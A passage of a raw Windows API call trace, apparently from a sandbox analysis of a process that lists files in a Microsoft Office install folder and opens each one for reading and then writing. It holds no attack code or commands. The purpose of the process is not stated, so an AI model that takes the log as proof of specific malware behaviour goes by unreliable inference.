Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0099.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.987] AreFileApisANSI () returned 1 [0099.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll", lpUsedDefaultChar=0x0) returned 70 [0099.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.987] AreFileApisANSI () returned 1 [0099.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0099.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8aeb0 [0099.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 70 [0099.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.987] GetLastError () returned 0x2 [0099.987] GetLastError () returned 0x2 [0099.987] SetLastError (dwErrCode=0x2) [0099.987] GetLastError () returned 0x2 [0099.987] SetLastError (dwErrCode=0x2) [0099.987] GetLastError () returned 0x2 [0099.987] SetLastError (dwErrCode=0x2) [0099.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0099.988] AreFileApisANSI () returned 1 [0099.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0099.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a530 [0099.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 70 [0099.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.988] GetLastError () returned 0x2 [0099.988] GetLastError () returned 0x2 [0099.988] SetLastError (dwErrCode=0x2) [0099.988] GetLastError () returned 0x2 [0099.988] SetLastError (dwErrCode=0x2) [0099.988] GetLastError () returned 0x2 [0099.988] SetLastError (dwErrCode=0x2) [0099.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0099.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.988] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x8683a0f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8683a0f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8683a0f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x77892bc0, cFileName="AppvIsvSubsystems64.dll", cAlternateFileName="APPVIS~4.DLL")) returned 1 [0099.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0099.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0099.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.989] AreFileApisANSI () returned 1 [0099.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll", lpUsedDefaultChar=0x0) returned 70 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.990] AreFileApisANSI () returned 1 [0099.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0099.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8af48 [0099.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 70 [0099.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.990] GetLastError () returned 0x2 [0099.990] GetLastError () returned 0x2 [0099.990] SetLastError (dwErrCode=0x2) [0099.990] GetLastError () returned 0x2 [0099.990] SetLastError (dwErrCode=0x2) [0099.990] GetLastError () returned 0x2 [0099.990] SetLastError (dwErrCode=0x2) [0099.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0099.990] AreFileApisANSI () returned 1 [0099.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0099.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8aa88 [0099.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 70 [0099.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.990] GetLastError () returned 0x2 [0099.990] GetLastError () returned 0x2 [0099.991] SetLastError (dwErrCode=0x2) [0099.991] GetLastError () returned 0x2 [0099.991] SetLastError (dwErrCode=0x2) [0099.991] GetLastError () returned 0x2 [0099.991] SetLastError (dwErrCode=0x2) [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.991] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd153dc41, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd153dc41, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1e7acf5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x69630, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVLP.exe", cAlternateFileName="")) returned 1 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a2d0 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0099.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0099.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0099.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0099.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.992] AreFileApisANSI () returned 1 [0099.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe", lpUsedDefaultChar=0x0) returned 57 [0099.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0099.992] AreFileApisANSI () returned 1 [0099.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0099.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 57 [0099.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.993] GetFileType (hFile=0x368) returned 0x1 [0099.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0099.993] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.993] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.994] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.994] CloseHandle (hObject=0x368) returned 1 [0099.994] AreFileApisANSI () returned 1 [0099.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0099.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 57 [0099.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.994] GetFileType (hFile=0x368) returned 0x1 [0099.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0099.994] CloseHandle (hObject=0x368) returned 1 [0099.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.995] AreFileApisANSI () returned 1 [0099.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0099.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0099.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 57 [0099.995] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd153dc41, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd153dc41, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1e7acf5, 